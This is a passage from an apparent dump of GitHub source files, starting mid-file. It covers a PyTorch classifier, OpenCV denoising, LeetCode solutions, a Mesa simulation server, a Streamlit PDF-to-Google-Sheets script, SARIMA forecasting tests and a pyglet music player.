label.cuda()\n with torch.set_grad_enabled(False):\n outputs = self.model(image)\n batch_size, num_class, H, W = outputs.shape\n outputs = outputs.view(batch_size, num_class)\n label = label.view(batch_size, num_class)\n loss = F.binary_cross_entropy_with_logits(outputs, label, reduction='none')\n loss = loss.mean()\n\n losses.append(loss.item())\n total += label.size(0)\n all_predicted.append(outputs.cpu().numpy())\n all_labels.append(label.cpu().numpy())\n correct += (outputs == label).sum().item()\n mean_loss = np.mean(losses)\n print('VALIDATION: Loss: '\n '{}, Accuracy: {}%'.format(mean_loss, (correct/total) * 100))\n return mean_loss, list(itertools.chain.from_iterable(all_predicted)), list(itertools.chain.from_iterable(all_labels))\n\n def training(self):\n for epoch in range(self.num_epochs):\n print(\"Epoch:[{}/{}]\".format(epoch + 1, self.num_epochs))\n self.train()\n val_loss, predicted, labels = self.validation()\n self.scheduler.step(val_loss)\n torch.save(self.model.state_dict(), self.save_path + '/cl2_resnet34.pth')\n\n def main(self):\n self.model = Resnet34_classification()\n self.model = self.model.to('cuda:0')\n self.optimizer = torch.optim.Adam(self.model.parameters(),\n lr=self.learning_rate,\n weight_decay=self.weight_decay)\n self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, mode=\"min\", patience=2, verbose=True)\n\n data_set = SteelDataset()\n validation_split = 0.2\n shuffle_dataset = True\n random_seed = 42\n dataset_size = len(data_set)\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n self.train_loader = torch.utils.data.DataLoader(data_set,\n sampler=train_sampler,\n batch_size=self.batch_size,\n num_workers=6,\n pin_memory=True,\n shuffle=False)\n\n self.val_loader = torch.utils.data.DataLoader(data_set,\n sampler=valid_sampler,\n batch_size=self.batch_size,\n num_workers=6,\n pin_memory=True,\n shuffle=False)\n self.training()\n\n\nif __name__ == '__main__':\n model = Train_Model()\n model.main()\n","repo_name":"Keleas/severstal_kaggle","sub_path":"[Keleas] 
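One caveat in the train/validation loops above: `current_acc` and `correct` compare raw logits to the 0/1 labels, so the equality almost never holds and the reported accuracy is not meaningful. With `binary_cross_entropy_with_logits` training, the usual metric thresholds the sigmoid of the logits first; a minimal sketch, not a patch to this repo's code:

```python
import torch

def multilabel_accuracy(logits, labels, threshold=0.5):
    # Logits -> probabilities -> hard 0/1 predictions, then elementwise match.
    preds = (torch.sigmoid(logits) > threshold).float()
    return (preds == labels).float().mean().item()

logits = torch.tensor([[2.0, -1.5, 0.3, -3.0]])
labels = torch.tensor([[1.0, 0.0, 1.0, 0.0]])
print(multilabel_accuracy(logits, labels))  # 1.0 on this toy example
```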
src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":11717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9752903479","text":"import sys\nsys.stdin = open('input.txt')\n\nt = int(input())\n# button = {'A': 300, 'B': 60, 'C': 10}\nbutton = {'A': 0, 'B': 0, 'C': 0}\n\n\ntmp = t\nwhile True:\n    if tmp == 0:\n        print(*list(button.values()))\n        break\n    elif tmp < 10:\n        print(-1)\n        break\n\n    elif tmp >= 300:\n        tmp = tmp - 300\n        button['A'] += 1\n        # print(tmp, '300')\n\n    elif tmp >= 60:\n        tmp = tmp - 60\n        button['B'] += 1\n        # print(tmp, '60')\n\n    elif tmp >= 10:\n        tmp = tmp - 10\n        button['C'] += 1\n        # print(tmp, '10')\n","repo_name":"seulgi-mun/Algorithm","sub_path":"Python/Baekjoon/10162_전자레인지.py","file_name":"10162_전자레인지.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12074559179","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#Denoising of Image:\r\n\r\nimg=cv2.imread("CamCann/Noisy.jpg")\r\n#Image denoising can be done by averaging pixel values, or by normal, Gaussian, or median blurring.\r\n\r\n#Median blur produces the best denoised image but reduces the clarity.\r\n\r\n#One can also apply morphological transformations such as erosion or dilation to perform the smoothing and denoising of the image/video.\r\n\r\n#The basic idea is to take a mask (kernel) of the required size and convolve it by moving it over the image.\r\nkernel=np.ones((5,5),np.float32)/25\r\ndenoised=cv2.filter2D(img,-1,kernel)\r\n\r\n#Applying Gaussian blur to filter noise in the image\r\ngaussian_blr=cv2.GaussianBlur(img,(15,15),0)\r\n\r\n#Applying median blur to filter noise in the image\r\nmedian_blr=cv2.medianBlur(img,15)\r\n\r\n#Output:\r\ncv2.imshow("denoised",denoised)\r\ncv2.imshow("Original",img)\r\ncv2.imshow("Gaussian Blur",gaussian_blr)\r\ncv2.imshow("Median Blur",median_blr)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n#Denoising of Video:\r\n\r\nvid=cv2.VideoCapture(0)\r\nwhile True:\r\n    _, frame = vid.read()\r\n    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n#Applying Gaussian blur to filter noise in the video\r\n    denoise_1=cv2.GaussianBlur(frame,(7,7),0)\r\n#Applying median blur to filter noise in the video\r\n    denoise_2=cv2.medianBlur(frame,7)\r\n    cv2.imshow('Original',frame)\r\n    cv2.imshow('Denoised_1',denoise_1)\r\n    cv2.imshow('Denoised_2',denoise_2)\r\n\r\n    k = cv2.waitKey(5) & 0xFF\r\n    if k == 27:\r\n        break\r\n\r\ncv2.destroyAllWindows()\r\nvid.release()\r\n","repo_name":"ksagrawal143/Denoising-Of-Image-Video","sub_path":"CamCannOCV.py","file_name":"CamCannOCV.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40220628958","text":"\"\"\"\nWrite a Python program to test whether a passed letter is a vowel or not.\n\"\"\"\n\n#our shitty code: :/ \ni=input(\"enter>>>>\")\n\nwovel=\"a\",\"e\",\"u\",\"i\",\"o\"\n\nif i in wovel:\n    print(\"vovel\")\nelse:\n    print(\"not\")\n    \n#%% \ndef is_vowel(char):\n    all_vowels = 'aeiou'\n    return char in all_vowels\nprint(is_vowel('c'))\nprint(is_vowel('e'))\n\n\n#%% shorter!\nletter = input('Please enter ')\n\n\nif letter in 'aeiou':\n    print('The letter is a vowel!')\nelse:\n    print('The letter is not a vowel.')\n    \n #%%\nimport re\nc=input(\"enter>>>>\")\n\n
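Beyond the kernel/Gaussian/median blurs demonstrated in the denoising script above, OpenCV also ships a dedicated non-local-means denoiser that averages similar patches from across the image, which preserves edges better than plain blurring. A hedged sketch reusing that script's input path:

```python
import cv2

img = cv2.imread("CamCann/Noisy.jpg")

# h / hColor set the filter strength; 7 is the template patch size
# and 21 the search window size (the documented defaults).
denoised = cv2.fastNlMeansDenoisingColored(img, None, 10, 10, 7, 21)

cv2.imwrite("CamCann/Noisy_nlm.jpg", denoised)
```

if 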
re.match(\"[aeiou]\",c):\n    print(\"vowel\")\nelse:\n    print(\"not\")\n    \n","repo_name":"deni-13/coding-challenges","sub_path":"mixed_ex/basics/1 (7).py","file_name":"1 (7).py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3073657779","text":"import jieba\nimport pandas as pd\nimport random\nimport numpy as np\nimport time\nfrom datetime import timedelta\nimport os\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nimport joblib  # sklearn.externals.joblib was removed from scikit-learn; use the standalone package\nfrom textDataProcess.dataload import move_stop_word\n\n\ndef get_time_dif(start_time):\n    \"\"\"Get the elapsed time\"\"\"\n    end_time = time.time()\n    time_dif = end_time - start_time\n    return timedelta(seconds=int(round(time_dif)))\n\n\ndef tokenizer(s):\n    words = []\n    cut = jieba.cut(s)\n    for word in cut:\n        if_stop = move_stop_word(word)\n        if if_stop:\n            words.append(word)\n    return words\n\n\ndef evaluate(y_preds, y_labels):\n    num = 0\n    count = 0\n    for pred, label in zip(y_preds, y_labels):\n        count = count + 1\n        if pred == label:\n            num = num + 1\n\n    return float(num / count)\n\n\ndef train(contents, labels, save_dir, k):\n    # Shuffle samples and labels in the same order\n    state = np.random.get_state()\n    np.random.shuffle(contents)\n    np.random.set_state(state)\n    np.random.shuffle(labels)\n    sep = int(len(contents) / 3 * 2)\n    if not os.path.exists(save_dir):\n        os.makedirs(save_dir)\n    model_path = os.path.join(save_dir, 'trainModel.pkl')\n    tf_idf_feature_path = os.path.join(save_dir, 'tfIdfFeature.pkl')\n\n    start_time = time.time()\n    form = pd.DataFrame(columns=['contents', 'labels'])\n    for content, label in zip(contents, labels):\n        form.loc[len(form)] = [content.strip(), label]\n    count = CountVectorizer(tokenizer=tokenizer)\n    count_vector = count.fit_transform(form.iloc[:, 0]).toarray()\n    count_vector_train = count_vector[:sep]\n    count_vector_val = count_vector[sep:]\n    joblib.dump(count.vocabulary_, tf_idf_feature_path)\n    model = KNeighborsClassifier(k)\n    model.fit(count_vector_train, form.iloc[:sep, 1].values)\n    joblib.dump(model, model_path)\n    time_dif = get_time_dif(start_time)\n\n    y_evaluate = model.predict(count_vector_val)\n    acc_val = evaluate(y_evaluate, form.iloc[sep:, 1].values)\n    return acc_val, time_dif\n\n\ndef test(test_data, save_dir):\n    model_path = os.path.join(save_dir, 'trainModel.pkl')\n    tf_idf_feature_path = os.path.join(save_dir, 'tfIdfFeature.pkl')\n\n    start_time = time.time()\n    loaded_vec = CountVectorizer(tokenizer=tokenizer, vocabulary=joblib.load(open(tf_idf_feature_path, \"rb\")))\n    form = pd.DataFrame(columns=['content'])\n    form.loc[len(form)] = [test_data.strip()]\n    count_vector = loaded_vec.transform(form.iloc[:, 0]).toarray()\n    index = len(count_vector)\n    model = joblib.load(model_path)\n    y_prediction = model.predict(count_vector[[index - 1]])\n    time_dif = get_time_dif(start_time)\n\n    return y_prediction, time_dif","repo_name":"BUPT902-Machine-Learning/Server","sub_path":"Machinelearning/textCoreAlgorithm/algorithm_KNN/run_knn.py","file_name":"run_knn.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"657793076","text":"class Solution:\n    # TC: O(n)  SC: O(n)\n    def containsDuplicate(self, nums: List[int]) -> bool:\n        result = set()\n\n        for num in nums:\n            result.add(num)\n\n        if len(result) == len(nums):\n            return False\n        else:\n
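The training routine above wires `CountVectorizer` and `KNeighborsClassifier` together by hand and persists the vocabulary and the model as two separate files. scikit-learn's `Pipeline` bundles the same two stages into one estimator and one artifact; an illustrative sketch with toy data, not code from this repo:

```python
import joblib
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import Pipeline

texts = ["good service", "bad food", "great food", "awful service"]
labels = ["pos", "neg", "pos", "neg"]

clf = Pipeline([
    ("vec", CountVectorizer()),            # tokenize + count in one step
    ("knn", KNeighborsClassifier(n_neighbors=1)),
])
clf.fit(texts, labels)

joblib.dump(clf, "knn_pipeline.pkl")       # one file instead of model + vocabulary
print(clf.predict(["good food"]))
```

            return 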
True\n","repo_name":"SeungyeonKang/LeetCode","sub_path":"easy/217. Contains Duplicate.py","file_name":"217. Contains Duplicate.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483916854","text":"# https://leetcode.com/problems/convert-sorted-list-to-binary-search-tree/description/\n\nclass Solution:\n def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n nums = []\n while head:\n nums.append(head.val)\n head = head.next\n \n def construct(left, right):\n if left > right:\n return None\n \n mid = (left + right) // 2\n return TreeNode(\n val = nums[mid],\n left = construct(left, mid - 1),\n right = construct(mid + 1, right)\n )\n \n return construct(0, len(nums) - 1)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_49/convert-sorted-list-to-bst.py","file_name":"convert-sorted-list-to-bst.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4377990269","text":"import mesa\n\nfrom rescue_robots.agents import FirstAidRobot, ExplorerDrone, Patient\nfrom rescue_robots.model import RescueRobots\n\n\ndef rescue_robot_portrayal(agent):\n if agent is None:\n return\n\n portrayal = {}\n\n if type(agent) is ExplorerDrone:\n portrayal[\"Shape\"] = \"rescue_robots/resources/droned.png\"\n portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 1\n\n\n elif type(agent) is FirstAidRobot:\n portrayal[\"Shape\"] = \"rescue_robots/resources/terrain.png\"\n portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 2\n portrayal[\"text\"] = round(agent.battery_level, 1)\n portrayal[\"text_color\"] = \"White\"\n\n elif type(agent) is Patient:\n if agent.not_critical_patient:\n portrayal[\"Shape\"] = \"rescue_robots/resources/person.png\"\n else:\n portrayal[\"Shape\"] = \"rescue_robots/resources/personcritical.png\"\n portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 0\n \n return portrayal\n\n\ncanvas_element = mesa.visualization.CanvasGrid(rescue_robot_portrayal, 20, 20, 500, 500)\nchart_element = mesa.visualization.ChartModule(\n [\n {\"Label\": \"FirstAid Terrain Robots\", \"Color\": \"#AA0000\"},\n {\"Label\": \"Explorer Drones\", \"Color\": \"#666666\"},\n {\"Label\": \"Patients\", \"Color\": \"#00AA00\"},\n ],\n data_collector_name='datacollector'\n)\n\nmodel_params = {\n # The following line is an example to showcase StaticText.\n \"title\": mesa.visualization.StaticText(\"Parameters:\"),\n \"bad_health_status\": mesa.visualization.Checkbox(\"Patient are in bad status\", True),\n \"initial_explorer_drones\": mesa.visualization.Slider(\"Initial Number of Explorer Drones\", 3, 0, 20),\n \"initial_firstaid_robots\": mesa.visualization.Slider(\"Initial Number of FirstAid Robots\", 3, 0, 20),\n \"initial_patients\": mesa.visualization.Slider(\n \"Initial Number of Patients\", 3,0,10\n ),\n \n}\n\nserver = mesa.visualization.ModularServer(\n RescueRobots, [canvas_element, chart_element], \"Mount Green Rescue Mission\", model_params\n)\nserver.port = 8521\n","repo_name":"eotobi/rescue-robots-simulation","sub_path":"rescue_robots/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4012513414","text":"from django import forms\n\nclass ContactForm(forms.Form):\n from_email = forms.EmailField(required=True,widget=forms.EmailInput(attrs={\n 
'class':'form-control stext-111 cl2 plh3 size-116 p-l-62 p-r-30',\n        'placeholder':'Your Email',\n        }))\n    message = forms.CharField(widget=forms.Textarea(attrs={\n        'class':'form-control stext-111 cl2 plh3 size-120 p-lr-28 p-tb-25',\n        'placeholder':'How Can We Help?',\n        }), required=True)\n","repo_name":"dat26061994/djangoProject","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17240553536","text":"import streamlit as st\nimport streamlit.components.v1 as stc\nimport pandas as pd\nimport docx2txt\nfrom PyPDF2 import PdfFileReader\nimport re\nimport gspread\nimport df2gspread as d2g\n\ndef read_pdf(file):\n    pdfReader = PdfFileReader(file)  # reads pdf\n    count = pdfReader.numPages  # counts the number of pages\n    content = " "  # placeholder for pdf content\n    for i in range(count):  # extract text from all pages\n        page = pdfReader.getPage(i)  # gets page numbers\n        content += page.extractText()  # extracts text from iterated pages\n    \n    return content\n\ndef main():\n    st.title("Pending Case Report")\n\n#uploads pdf\npdf_file = st.file_uploader('Upload pdf', type = 'pdf')\n\nif pdf_file is not None:\n    read_pdf(pdf_file)\n\nif __name__ == '__main__':\n\tmain()\n\npdf_raw_text = read_pdf(pdf_file) \n#regex to find cause numbers in the extracted text\nfinds_cause_numbers = re.findall(r'\d{2}-\d{2}-\d{5}-\w*', pdf_raw_text)\n#puts the cause numbers into a dataframe with the column name 'cause_number'\npending_cause_number_df = pd.DataFrame(finds_cause_numbers, columns = ['cause_number'])\n\n#opens the google sheet of pending case notes\n    #sets the json to service account path\njson_path = gspread.service_account(filename = '/Users/hector/codeup-data-science/293pending_cases/pending_cases.json')\n    #opens the google sheet by key found in the address\nopens_civil_pending_gs = json_path.open_by_key('1b3fmZrbfwZWMvu4kUGJSSGsp61utlE0Ny-ebozZ5aBk')\n    #pulls the data from the google worksheet (civil_pending_notes tab)\ncivil_pending_notes_tab = opens_civil_pending_gs.get_worksheet(0)\n    #puts the data from the google sheet into a dataframe\ncivil_pending_notes = pd.DataFrame(civil_pending_notes_tab.get_all_records())\n\n#adds both lists together in order to search for dups later\ndf = civil_pending_notes.append(pd.DataFrame(pending_cause_number_df, columns=['cause_number']), ignore_index=True)\n    #drops the duplicated cause numbers and reindexes the dataframe\n    #resets the index and drops the output index\n    #fills in the na with an empty space to avoid error\ndf = df.drop_duplicates('cause_number').reset_index(drop=True).fillna(' ')\n\n#Clears the google spreadsheet for the update\ncivil_pending_notes_tab.clear()\n#updates the google sheet with the new list of pending cases\ncivil_pending_notes_tab.update([df.columns.values.tolist()] + df.values.tolist())\n","repo_name":"hrodjr/293pending_cases","sub_path":"pending_cases.py","file_name":"pending_cases.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"249878603","text":"import pandas as pd\nimport os\nimport json \n#import MASTERFILE.Limpia_Data as LIMPIA\n#import MASTERFILE.Analisis as Reporte\n#import MASTERFILE.CountFunctions as CountFunctions\n\n''' ~~ FILL INFORMATION BELOW THIS LINE ~~ '''\nbrands = ["ChefPremier", "Mooch App", "7enequilibrio"] # Run Genera Base Twitter first\n
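The docket-number pattern used above is easy to sanity-check in isolation; the sample text below is invented purely for illustration:

```python
import re

sample = "Cases heard: 21-05-12345-CV and 20-11-00042-CR; one motion pending."
print(re.findall(r'\d{2}-\d{2}-\d{5}-\w*', sample))
# ['21-05-12345-CV', '20-11-00042-CR']
```

for brand in 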
brands:\n folder_name = brand\n\n with open(r\"Data/%s/Competencia.json\"%brand) as f:\n competencia = json.load(f)\n\n\n with open(r\"Data/%s/crecimiento_estatal.json\"%brand) as f:\n crecimiento = json.load(f)\n\n with open(r\"RESULTADOS/%s/JSON/SentimientoProm_Region.json\"%brand) as f:\n sentimiento = json.load(f)\n\n\n Regiones = competencia.keys()\n Regiones\n mapa={}\n for region in Regiones:\n if region == \"Sureste\":\n mapa[\"SurEste\"]={\n 'Sentiment': sentimiento[\"SurEste\"][\"Sentiment\"],\n 'Competencia': competencia[region],\n 'Crecimiento': crecimiento [region]\n }\n else:\n mapa[region]={\n 'Sentiment': sentimiento[region][\"Sentiment\"],\n 'Competencia': competencia[region],\n 'Crecimiento': crecimiento [region]\n }\n\n with open (r\"RESULTADOS\\%s\\JSON\\MapaCompetencia.json\"%brand, 'w') as file:\n json.dump( mapa ,file)\n","repo_name":"jcarvargtz/twitter_marcas_master","sub_path":"MASTERFILE/Genera_Mapa_Competencia.py","file_name":"Genera_Mapa_Competencia.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2112098444","text":"import numpy as np\nimport myfitrw_092018 as mfr\nimport mylcgen as mlcg\nimport matplotlib.pylab as plt\n\nimport statsmodels.api as sm \nfrom statsmodels.tsa.stattools import acf \nfrom statsmodels.tsa.stattools import pacf\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\ntlen = 3000.0\ndt = 1.0\n\n#enter period of long time-scale variations\nperiod = [365.0,180.0]\ncolor= ['r','b']\n\n#amplitude relative to standard deviation of random time series\namp_p = [0.1,0.1]\n\n#generate fake data with a large amplitude period\n\n\n\n#first generate the random-ness\ndat = mlcg.mylcgen(datfile='',p0=1.0,f0=0.1,a=-2,b=-2,tlo=0,thi=tlen,dt=dt,ploton=0,iseed=-1,meannorm = -1., sdnorm = -1.0)\nnd = np.shape(dat[:,0])[0]\n\n\nstd = np.std(dat[:,1])\n#now modulate with a large (annual) like the bike hire data\nvariation = np.zeros(nd)\nfor ipn in range(len(period)):\n variation = variation + amp_p[ipn]*std*np.sin(2*np.pi/period[ipn] * dat[:,0])\n\n\n\n#add on the periodic variability\ndat[:,1] = dat[:,1] + variation\n\n\n\n\n#compute the fourier transform\nft = np.fft.fft(dat[:,1])\nfreq = np.fft.fftfreq(nd)\nps = np.abs(ft)**2\n\n\n\n\n#plot the result\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(dat[:,0],dat[:,1],marker='o',ls=None)\nax1.set_xlabel('Time (days)')\nax1.set_ylabel('Time Series')\n\nyl = list(ax1.get_ylim())\n\nipn = 0\nfor pnow in period:\n tnow = pnow/4\n idp = 0\n while (tnow < dat[-1,0]):\n if (idp == 0):\n ax1.plot([tnow]*2,yl,ls='--',color=color[ipn],label='synthetic period '+np.str(pnow)+' days')\n else:\n ax1.plot([tnow]*2,yl,ls='--',color=color[ipn])\n tnow = tnow + pnow\n idp = idp + 1\n ipn = ipn + 1\nplt.legend()\nplt.savefig('test_data_diagnose.pdf')\n\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(freq,ps,marker='o',ls=None)\nax1.set_xlabel('frequency (cycles/day)')\nax1.set_ylabel('P(f)')\nax1.set_xscale('log')\nax1.set_yscale('log')\nyl = list(ax1.get_ylim())\nfor ipn in range(len(period)):\n ax1.plot([1./period[ipn]]*2,yl,ls='--',color=color[ipn],label='synthetic period '+np.str(period[ipn])+' days')\nplt.legend()\nplt.savefig('test_pspec_diagnose.pdf')\n\n\n\n\n\n\n\n\n#mfr.fitrw([dat[:,0]],[dat[:,1]],[np.ones(nd)],floin=-1,fhiin=-1,plot_tit='fig_myrwfit',dtresin=-1,nits = 1,tplotlims=[],extra_f=[],\n#p0=-1,bpl = [0.5,2,2],messages=0)\n\nfrom statsmodels.tsa.seasonal import 
seasonal_decompose\ndecomposition = seasonal_decompose(dat[:,1], freq=10) \ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nres = decomposition.resid\nfig = plt.figure() \nfig = decomposition.plot() \nfig.set_size_inches(15, 8)\nplt.savefig('arima.pdf')\n\n\n\n\nstartforecast = 2600\nendforecast = 3000\n\nmod = sm.tsa.statespace.SARIMAX(dat[:startforecast,1], trend='n', order=(0,1,0), seasonal_order=(1,1,1,12))\nresults = mod.fit()\n\nplt.clf()\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n#get condfidence limits\npred = results.get_prediction(start = startforecast, end= endforecast)\nps = pred.summary_frame()\npslo = np.array(ps['mean_ci_lower'])\npshi = np.array(ps['mean_ci_upper'])\npst = np.arange(startforecast,endforecast+1)\npsmean = np.array(ps['mean'])\nax1.plot(pst,psmean)\nax1.plot(dat[:startforecast,0],dat[:startforecast,1])\n\nax1.fill_between(pst,pslo,pshi,alpha=0.2)\n\nax1.plot(dat[startforecast:,0],dat[startforecast:,1],ls='--',color='k')\n\nplt.savefig('forecast.pdf')\n\n\n\n\nparmout,covout,freq,tplot,xplot,xplotsd,p0_out,w0,dw,sig2_prior=mfr.fitrw([dat[:startforecast,0]],[dat[:startforecast,1]],[0.95],\nfloin=1./6000,fhiin=1.0,plot_tit='fig_myrwfit',dtresin=dat[:,0],nits = 100,tplotlims=[],extra_f=[1./365,1./180.],p0=-1,bpl = [0.5,2,2])\n#mod = sm.tsa.statespace.SARIMAX(df.riders, trend='n', order=(0,1,0), seasonal_order=(1,1,1,12))\n#results = mod.fit()\n#print results.summary()\n\n#this is a good tutorial follow for timeseries forecasting\n#https://towardsdatascience.com/an-end-to-end-project-on-time-series-analysis-and-forecasting-with-python-4835e6bf050b\n\n\n\n#compare the seasonal arima and \n\n\n\n","repo_name":"drds1/projects","sub_path":"seasonal_arima/code_dir/test_drwmod.py","file_name":"test_drwmod.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18356325097","text":"from DateTime import DateTime\nfrom ftw.upgrade import ProgressLogger\nfrom ftw.upgrade import UpgradeStep\nfrom zope.annotation import IAnnotations\n\n\nANN_KEY = 'ftw.file-upgrade-1500-migrated-data'\n\n\nclass AddDocumentDateIndex(UpgradeStep):\n\n def __call__(self):\n self.setup_install_profile('profile-ftw.file.upgrades:1500')\n if not self.catalog_has_index('documentDate'):\n self.catalog_add_index('documentDate', 'DateIndex')\n self.migrate_dates()\n self.catalog_reindex_objects({'portal_type': 'File'},\n idxs=['effective', 'documentDate'])\n\n def migrate_dates(self):\n objects = self.catalog_unrestricted_search({'portal_type': 'File'},\n full_objects=True)\n\n with ProgressLogger('Migrate file dates', objects) as step:\n for obj in objects:\n ann = IAnnotations(obj)\n if ann.get(ANN_KEY, None) is not None:\n step()\n continue\n\n ann[ANN_KEY] = True\n\n newdate = obj.getEffectiveDate()\n if not newdate:\n newdate = obj.created()\n obj.setDocumentDate(newdate)\n obj.setEffectiveDate(DateTime())\n step()\n","repo_name":"4teamwork/ftw.file","sub_path":"ftw/file/upgrades/to_1500.py","file_name":"to_1500.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40925196450","text":"from flask import Flask\nfrom flask_user import SQLAlchemyAdapter, UserManager\n\nfrom cfg import logconf\nfrom db_config import db_create, db_create_tables, db_delete\nfrom init_db import create_default_entries_in_db\nfrom models import users\n\n\ndef user_config():\n db = 
SharedState().getInstance().db\n    app = SharedState().getInstance().app\n\n    user_manager = UserManager(app, db, users.User)\n    SharedState().getInstance().user_mgr = user_manager\n    logging.getLogger(__name__).info('Finished Initializing flask_user')\n\nclass FlaskInit(object):\n    def __init__(self):\n        self.flask_app = Flask(__name__)\n        logconf.setup_logger()\n        user_config()\n\n    def db_setup(self, default_entry_create=True):\n        # once we start migrations, we'll not do this\n        db_delete()\n        db_create()\n        db_create_tables(model_module=self.model_module)\n        if default_entry_create:\n            create_default_entries_in_db()\n\n    def get_flask_app(self):\n        return self.flask_app\n\n\nflask_init = FlaskInit()\nleitrim_server = flask_init.get_flask_app()\nleitrim_server.run(host='0.0.0.0', port=5002)\n","repo_name":"venunayar/example-web-service","sub_path":"src/mgmt/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9422073830","text":"# # Definition for singly-linked list.\n# # class ListNode:\n# #     def __init__(self, x):\n# #         self.val = x\n# #         self.next = None\n\n# class Solution:\n#     def hasCycle(self, head: ListNode) -> bool:\n#         tortoise=head\n#         hare = head\n#         begin=0\n#         while( hare is not None and tortoise is not None ):\n#             if(tortoise ==hare and begin!=0 ):\n#                 return True\n#             else:\n#                 if(tortoise.next):\n#                     tortoise=tortoise.next.next\n#                 else:\n#                     tortoise=tortoise.next\n#                 hare=hare.next\n#                 begin+=1\n#         return \n\n    \nclass Solution:\n    def hasCycle(self, head: ListNode) -> bool:\n        tortoise = head\n        hare = head\n        \n        while hare and tortoise and tortoise.next:\n            tortoise = tortoise.next.next\n            hare = hare.next\n            if tortoise == hare:\n                return True\n        return False\n    
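Why the two pointers in `hasCycle` must meet: each iteration shrinks the gap between the fast and slow pointer by one (modulo the cycle length), so once both are inside the cycle the gap eventually reaches zero. Note the solution above swaps the conventional naming (its `tortoise` is the fast pointer). A self-contained check of the same logic, with a throwaway `Node` class defined just for the demo:

```python
class Node:
    def __init__(self, x):
        self.val = x
        self.next = None

def has_cycle(head):
    slow = fast = head
    while fast and fast.next:
        slow = slow.next              # 1 step
        fast = fast.next.next         # 2 steps
        if slow is fast:
            return True
    return False

# 1 -> 2 -> 3 -> back to 2 (a cycle), and a straight 1 -> 2 list.
a, b, c = Node(1), Node(2), Node(3)
a.next, b.next, c.next = b, c, b
print(has_cycle(a))   # True

x, y = Node(1), Node(2)
x.next = y
print(has_cycle(x))   # False
```

","repo_name":"rezavai92/leetcode-solution","sub_path":"141. 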
Linked List Cycle/floyd-cycle.py","file_name":"floyd-cycle.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37809103317","text":"import pyglet\r\nimport os\r\nfrom colorama import Fore\r\n\r\nwhile True:\r\n    i = os.listdir()\r\n\r\n    # remove this script itself from the listing by index\r\n    e = i.index('main.py')\r\n    ii = i.pop(e)\r\n\r\n    for o in i:\r\n        print(Fore.GREEN + o)\r\n\r\n    a = input(Fore.BLUE + 'name:')\r\n    if a + '.mp3' in i:\r\n        index = i.index(a + '.mp3')\r\n\r\n        song = pyglet.media.load(i[index])\r\n        player = pyglet.media.Player()\r\n        player.queue(song)\r\n\r\n        # Play the song\r\n        player.play()\r\n\r\n        is_paused = False  # Flag showing whether the song is currently paused\r\n\r\n        while True:\r\n            pause = input('command:')\r\n            if pause.lower() == 'yes':\r\n                if not is_paused:\r\n                    player.pause()\r\n                    is_paused = True\r\n            elif pause.lower() == 'no':\r\n                if is_paused:\r\n                    player.play()\r\n                    is_paused = False\r\n            elif pause == 'music':\r\n                break\r\n        continue\r\n    else:\r\n        print(Fore.RED + 'Song not 